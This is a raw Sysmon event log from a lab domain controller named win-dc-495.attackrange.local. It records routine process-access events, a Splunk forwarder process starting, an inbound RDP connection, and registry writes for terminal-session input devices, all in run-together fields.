13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.885{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:11.993{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000009657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localRDP2021-01-18 13:58:11.884{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.90.199.65-59764-false10.0.1.14win-dc-495.attackrange.local3389ms-wbt-server 13241300x80000000000000009713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000009711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000009710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x80000000000000009708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000009707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 13241300x80000000000000009706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000009704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000009703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000009702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x80000000000000009701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000009700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 10341000x80000000000000009699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 